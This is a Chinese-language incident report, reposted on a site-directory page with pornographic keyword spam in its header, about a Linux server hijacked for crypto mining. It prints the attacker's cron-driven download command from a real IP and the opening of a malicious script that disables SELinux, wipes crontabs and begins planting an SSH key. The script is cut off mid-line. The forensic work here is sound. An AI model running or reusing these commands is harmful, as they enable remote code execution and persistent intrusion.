日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網為廣大站長提供免費收錄網站服務,提交前請做好本站友鏈:【 網站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

周一早上剛到辦公室,就聽到同事說有一臺服務器登陸不上了,我也沒放在心上,繼續邊吃早點,邊看幣價是不是又跌了。

 

記一次Linux被入侵,服務器變“礦機”的全過程

 

 

不一會運維的同事也到了,氣喘吁吁的說:我們有臺服務器被阿里云凍結了,理由:對外惡意發包。

我放下酸菜餡的包子,SSH 連了一下,被拒絕了,問了下默認的 22 端口被封了。

讓運維的同事把端口改了一下,立馬連上去,順便看了一下登錄名 :root,還有不足 8 位的小白密碼,心里一涼:被黑了!

查找線索

服務器系統 centos 6.X,部署了 Nginx,Tomcat,redis 等應用,上來先把數據庫全備份到本地,然后 Top 命令看了一下,有 2 個 99% 的同名進程還在運行,叫 gpg-agentd。

 

記一次Linux被入侵,服務器變“礦機”的全過程

 

 

google 了一下 GPG,結果是:GPG 提供的 gpg-agent 提供了對 SSH 協議的支持,這個功能可以大大簡化密鑰的管理工作。

看起來像是一個很正經的程序嘛,但仔細再看看服務器上的進程后面還跟著一個字母 d,偽裝的很好,讓人想起來 windows 上各種看起來像 svchost.exe 的病毒。

繼續排查:

ps eho command -p 23374netstat -pan | grep 23374 

查看 pid:23374 進程啟動路徑和網絡狀況,也就是來到了圖 1 的目錄,到此已經找到了黑客留下的二進制可執行文件。

接下來還有 2 個問題在等著我:

  • 文件是怎么上傳的?
  • 這個文件的目的是什么,或是黑客想干嘛?

History 看一下,記錄果然都被清掉了,沒留下任何痕跡。繼續命令 more messages:

 

記一次Linux被入侵,服務器變“礦機”的全過程

 

 

看到了在半夜 12 點左右,在服務器上裝了很多軟件,其中有幾個軟件引起了我的注意,下面詳細講。

邊找邊猜,如果我們要做壞事,大概會在哪里做文章,自動啟動?定時啟動?對,計劃任務:

crontab -e 

 

記一次Linux被入侵,服務器變“礦機”的全過程

 

 

果然,線索找到了。

作案動機

上面的計劃任務的意思就是每 15 分鐘去服務器上下載一個腳本,并且執行這個腳本。

我們把腳本下載下來看一下:

curl -fsSL 159.89.190.243/ash.php > ash.sh 

腳本內容如下:

uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa 

分享到:
標簽:入侵
用戶無頭像

網友整理

注冊時間:

網站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網站吧!
最新入駐小程序

數獨大挑戰2018-06-03

數獨一種數學游戲,玩家需要根據9

答題星2018-06-03

您可以通過答題星輕松地創建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學四六

運動步數有氧達人2018-06-03

記錄運動步數,積累氧氣值。還可偷

每日養生app2018-06-03

每日養生,天天健康

體育訓練成績評定2018-06-03

通用課目體育訓練成績評定